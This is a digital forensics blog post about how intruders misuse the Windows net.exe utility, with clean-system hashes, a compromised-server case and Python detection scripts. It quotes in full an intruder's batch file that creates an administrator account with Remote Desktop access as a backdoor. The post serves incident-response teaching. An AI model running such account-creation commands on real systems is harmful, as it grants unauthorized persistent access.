Forensic Data Solutions® 

Service you can count on


Net Commands

Posted by M. Gene Shantz on December 30, 2015 at 4:05 PM

I have come across the executable “net.exe” several times during engagements and heard it referred to as a tool commonly used by nefarious intruders to do bad things in a network. So I decided that it would make a good forensic topic.

For those of us who do not come from an IT background, it is important to learn and understand that intruders can and often will use IT administrative tools that are already in the environment they are compromising, so that we are able to trace their activities within the network. While Trojans and viruses give the intruder the initial access to the system, intruders will commonly use legitimate command-line tools to navigate and traverse the network, as well as to hide their activity for as long as possible.

The Net Command is described by Microsoft as: “The Net.exe Utility component is a command-line tool that controls users, groups, services, and network connections.”


This command is a very powerful tool that intruders like to use for various tasks, such as mapping a network or creating and/or modifying user accounts once they get administrative access.

The Net command list is quite long and not the focus of this nugget. However, if you are looking to mess around with a few of the commands just to see its power and usefulness, here are a couple of websites that list the commands and provide examples.

First, let’s talk about where you should see this file on a clean system. On my clean Windows 7 x64 box, these were the 4 locations for this file. Note that this is a 64-bit OS, so there is a 32-bit executable in the SysWOW64 directory and the 64-bit one in the System32 directory.


The file MD5 hash values are:

64 bit > 63DD6FBAABF881385899FD39DF13DCE3

32 bit > B9A4DAC2192FD78CDA097BFA79F6E7B2

From an engagement perspective, I wanted to share an example of how I have come across this tool in use.

During an engagement where a server was significantly compromised, after finding the creation of a user account in the log analysis, we located a folder that was in the Windows directory off the root that contained a few tools and batch files that were placed there by the intruder.

Note the presence of the services.exe and the net.exe. What is interesting is that, when comparing the hash values of the net.exe files, the suspicious one did not match either of the known good files. A VirusTotal lookup of the suspicious file showed it was the net1.exe from Win7 SP1, which had been renamed and moved to this directory by the intruder.
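The comparison described above can be scripted against a mounted image. This is an added example, not code from the original post; `triage` and `md5_of` are hypothetical names, and the baseline holds only the two net.exe hashes and the two directories the post gives, so extend both from your own clean reference system.

```python
import hashlib
from pathlib import Path

# MD5 values the post lists for net.exe on the author's clean Windows 7 x64 box.
# Other patch levels will hash differently: build the baseline from a matching clean image.
KNOWN_GOOD_MD5 = {
    "63dd6fbaabf881385899fd39df13dce3",  # 64-bit
    "b9a4dac2192fd78cda097bfa79f6e7b2",  # 32-bit
}
# Only the two directories named in the post (assumption: add the others from your baseline).
EXPECTED_DIRS = {"windows/system32", "windows/syswow64"}


def md5_of(path, chunk=1 << 20):
    """Hash a file in chunks so large files do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def triage(image_root, known_good=KNOWN_GOOD_MD5, expected_dirs=EXPECTED_DIRS):
    """List every file named net.exe under image_root with the reasons it is suspicious."""
    root = Path(image_root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.name.lower() != "net.exe":
            continue
        rel_dir = path.parent.relative_to(root).as_posix().lower()
        digest = md5_of(path)
        reasons = []
        if rel_dir not in expected_dirs:
            reasons.append("unexpected location")
        if digest not in known_good:
            reasons.append("hash not in baseline")
        findings.append({"path": path.relative_to(root).as_posix(),
                         "md5": digest, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    import sys
    for f in triage(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f["path"], f["md5"], ", ".join(f["reasons"]) or "ok")
```

A copy that fails both checks, like the one in this engagement, is the one to submit for a hash lookup, since the file name alone says nothing about what the binary really is.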



So what is the difference between net.exe and net1.exe? According to Tim Fisher, the net.exe command had to undergo a modification due to Y2K, and the net1 file is the old version that is still used for backward compatibility, but essentially the files serve the same purpose and function.

As a side note, the service.exe file in this directory was flagged in VirusTotal as a Trojan and came back as the file below that had been renamed.



So let’s see how the intruder used the net command in this case. The boot.bat file was simply a batch file that contained the following net commands.

@echo off

@net user hover 58911xc, /add

@net localgroup administrators hover /add

@net user hover /active:yes

@net user hover 58911xc,

@net localgroup "Remote Desktop Users" hover /add


This was a simple batch file that first turns off the echo for a little more stealth and then creates the user account “hover”. The next line adds the account to the administrators group, and the line after that activates it. The batch file then sets the account's password again and finally adds the account to the Remote Desktop Users group to allow it to be logged into remotely.

In one simple swoop, this intruder used the net command to give himself/herself backdoor remote access that allowed him/her to return at their convenience.
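The sequence in boot.bat is easy to hunt for in batch files or process command-line logs. The following is an added example, not part of the original post: `parse_net` and `backdoor_accounts` are hypothetical names, and `SAMPLE` is the batch file quoted above plus two constructed benign lines.

```python
import re
from collections import defaultdict

# net / net1, with optional path, optional .exe and the leading "@" used in batch files.
NET_RE = re.compile(r'^@?\s*"?(?:[^"\s]*\\)?net1?(?:\.exe)?"?\s+(.+)$', re.IGNORECASE)
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}


def parse_net(line):
    """Return (action, account, group) events for one account-related net command."""
    m = NET_RE.match(line.strip())
    if not m:
        return []
    # Keep quoted names such as "Remote Desktop Users" together as one token.
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', m.group(1))]
    verb = tokens[0].lower()
    switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
    operands = [t.lower() for t in tokens[1:] if not t.startswith("/")]
    if verb == "user" and operands:
        if "/add" in switches:
            return [("create", operands[0], None)]
        if "/active:yes" in switches:
            return [("activate", operands[0], None)]
        if len(operands) > 1:
            return [("set_password", operands[0], None)]
    if verb == "localgroup" and "/add" in switches and len(operands) > 1:
        return [("group_add", member, operands[0]) for member in operands[1:]]
    return []


def backdoor_accounts(lines):
    """Accounts created and added to a privileged group within the same input."""
    created, groups = set(), defaultdict(set)
    for line in lines:
        for action, account, group in parse_net(line):
            if action == "create":
                created.add(account)
            elif action == "group_add" and group in PRIVILEGED_GROUPS:
                groups[account].add(group)
    return {a: sorted(groups[a]) for a in sorted(created) if groups[a]}


SAMPLE = [
    "@echo off", "@net user hover 58911xc, /add",
    "@net localgroup administrators hover /add", "@net user hover /active:yes",
    "@net user hover 58911xc,", '@net localgroup "Remote Desktop Users" hover /add',
    "net use Z: \\\\fileserver\\share",  # constructed benign line
    "net localgroup administrators",     # constructed: only lists group members
]

if __name__ == "__main__":
    print(backdoor_accounts(SAMPLE))
```

The same account events should also appear in the Windows Security log, which is where the account creation was first noticed in this engagement.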

From a network mapping perspective, if an intruder can gain access to a command prompt in the environment, they can run a simple command that will list out all the systems on the network, giving the intruder a pretty good idea where to look next.


Categories: Windows Artifacts
